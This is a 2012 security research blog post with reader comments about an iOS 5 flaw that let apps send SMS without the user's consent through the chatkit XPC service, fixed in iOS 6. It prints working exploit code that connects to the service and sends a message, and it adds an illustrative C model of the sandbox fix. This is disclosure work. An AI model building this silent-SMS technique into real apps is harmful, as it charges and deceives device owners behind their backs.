October 24, 2012

Your Flashlight Can Send SMS — One More Reason to Update to iOS 6

Today I'm not going to tell you how the security system of iOS 5 is organized, and we will not gather bits of information through undocumented features either. We'll just send an SMS from an application behind the user's back.

There is very little information describing low-level operation of iOS, and the scattered bits that exist do not give the whole picture. Many header files are not publicly available, so most steps are taken blindly. Mac OS X, the ancestor of the mobile platform, becomes the main experimental field.

One of the inter-process communication mechanisms in Mac OS X is XPC. This system layer was developed for inter-process communication based on the transfer of plist structures, using libSystem and launchd. In effect, it is an interface that lets processes be managed through the exchange of structures such as dictionaries. By inheritance, iOS 5 has this mechanism as well.

You might already see where this introduction is going. Yes, there are system services in iOS that expose XPC communication, and I want to illustrate this with the daemon responsible for sending SMS. It should be mentioned that the vulnerability is fixed in iOS 6, but it is relevant for iOS 5.0 through 5.1.1. No jailbreak, private frameworks, or other illegal tools are required to exploit it; only the set of header files from the directory /usr/include/xpc/* is needed.

One of the components of SMS sending in iOS is the system service com.apple.chatkit, whose tasks include generating, managing, and sending short text messages. For ease of control, it exposes a publicly reachable communication port, com.apple.chatkit.clientcomposeserver.xpc. Through the XPC subsystem, messages can be generated and sent without the user's approval.

Well, let's try to create a connection.

// Create a dispatch queue for the connection's events and open a connection
// to the compose server's Mach service.
xpc_connection_t myconnection;
dispatch_queue_t queue = dispatch_queue_create("com.apple.chatkit.clientcomposeserver.xpc", DISPATCH_QUEUE_CONCURRENT);
myconnection = xpc_connection_create_mach_service("com.apple.chatkit.clientcomposeserver.xpc", queue, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
Now we have an XPC connection, myconnection, to the SMS sending service. However, XPC creates connections in a suspended state, so one more step is needed to activate it.

xpc_connection_set_event_handler(myconnection, ^(xpc_object_t event){
        xpc_type_t xtype = xpc_get_type(event);
        if (XPC_TYPE_ERROR == xtype) {
                // The service refused or dropped the connection; iOS 6 reports the sandbox denial here.
                NSLog(@"XPC sandbox connection error: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION));
        } else {
                // Always set an event handler. More on this later.
                NSLog(@"Received a message event!");
        }
});
// Connections are created suspended; resume to activate this one.
xpc_connection_resume(myconnection);

The connection is now active. At this very moment iOS 6 writes a message to the device log saying that this type of communication is forbidden. Next we need to build an xpc_dictionary with the data required for sending the message.

// Recipient list, serialized as a binary plist the way the service expects it.
NSArray *recipients = [NSArray arrayWithObjects:@"+7 (90*) 000-00-00", nil];
NSData *ser_rec = [NSPropertyListSerialization dataWithPropertyList:recipients format:NSPropertyListBinaryFormat_v1_0 options:0 error:NULL];

// Request dictionary: message type, serialized recipients, and the message text.
xpc_object_t mydict = xpc_dictionary_create(NULL, NULL, 0);
xpc_dictionary_set_int64(mydict, "message-type", 0);
xpc_dictionary_set_data(mydict, "recipients", [ser_rec bytes], [ser_rec length]);
xpc_dictionary_set_string(mydict, "text", "hello from your application!");

Little is left: send the message to the XPC port and make sure it is delivered.

xpc_connection_send_message(myconnection, mydict);
xpc_connection_send_barrier(myconnection, ^{
        // Runs once everything queued before it has been sent.
        NSLog(@"Message has been successfully delivered");
});

Sound of an SMS being sent to a short number.

So before this vulnerability was eliminated in iOS 6, any application could send an SMS without the user's approval. Apple added one more security layer to iOS 6, which prevents connections to this service from within the sandbox.
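To make the fix concrete, here is a small model of that extra layer: a default-deny evaluator for mach-lookup rules, in the spirit of the (allow mach-lookup (global-name "...")) form of Apple's sandbox profiles. This is an example added here, not code from the post or from Apple; the rule semantics (last matching rule wins), the prefix-glob syntax and both profiles are constructed for illustration.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* One rule of a simplified sandbox profile: allow or deny mach-lookup of a
   global service name. A trailing '*' matches any suffix. Constructed model,
   not Apple's evaluator. */
typedef struct { bool allow; const char *pattern; } lookup_rule_t;

/* Prefix glob: "com.apple.chatkit.*" matches
   "com.apple.chatkit.clientcomposeserver.xpc"; otherwise exact match. */
static bool pattern_matches(const char *pattern, const char *name) {
    size_t n = strlen(pattern);
    if (n > 0 && pattern[n - 1] == '*')
        return strncmp(pattern, name, n - 1) == 0;
    return strcmp(pattern, name) == 0;
}

/* Default deny; in this model the last matching rule wins, so a later,
   more specific deny overrides an earlier broad allow. */
bool mach_lookup_allowed(const lookup_rule_t *rules, size_t nrules, const char *service) {
    bool verdict = false;
    for (size_t i = 0; i < nrules; i++)
        if (pattern_matches(rules[i].pattern, service))
            verdict = rules[i].allow;
    return verdict;
}

#define SMS_SERVICE "com.apple.chatkit.clientcomposeserver.xpc"

/* Constructed profile standing in for the iOS 5 situation the post describes:
   a broad allow rule lets any sandboxed app reach the compose server. */
static const lookup_rule_t ios5_like[] = {
    { true, "com.apple.*" },
};

/* Constructed profile for the iOS 6 fix as described: the same broad allow,
   followed by a specific deny for the SMS compose service. */
static const lookup_rule_t ios6_like[] = {
    { true,  "com.apple.*" },
    { false, "com.apple.chatkit.*" },
};

bool ios5_can_reach_sms(void)   { return mach_lookup_allowed(ios5_like, 1, SMS_SERVICE); }
bool ios6_can_reach_sms(void)   { return mach_lookup_allowed(ios6_like, 2, SMS_SERVICE); }
/* "com.apple.example.other" is a made-up service name for contrast. */
bool ios6_can_reach_other(void) { return mach_lookup_allowed(ios6_like, 2, "com.apple.example.other"); }
```

Under the iOS 5-like profile the lookup succeeds and the exploit proceeds; under the iOS 6-like profile the lookup is refused, which is what the event handler above observes as an XPC error.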

Thank you for your attention!

Author: Kirill Ermakov, Positive Research.


  1. Hi, this is the first time I have visited this. I want to ask you a question about this blog: does what you describe mean that an application can "easily" send SMS without the owner's knowledge? Some of my family members have iPhones and not all of them have updated to iOS 6; will applications still be able to send SMS even though they still have iOS 5?

    Well, that is how I understood your blog, but I wanted to make sure.

    Besides my questions I think your blog is great (even though I have only read two of your blogs :P) and you are very good at explaining the problems with text and backing it up with the reasons behind these problems so great job, keep up the good work :)

    1. Hi, thanks! This ability works on all iOS 5 devices.
      As I said, it is fixed in iOS 6.
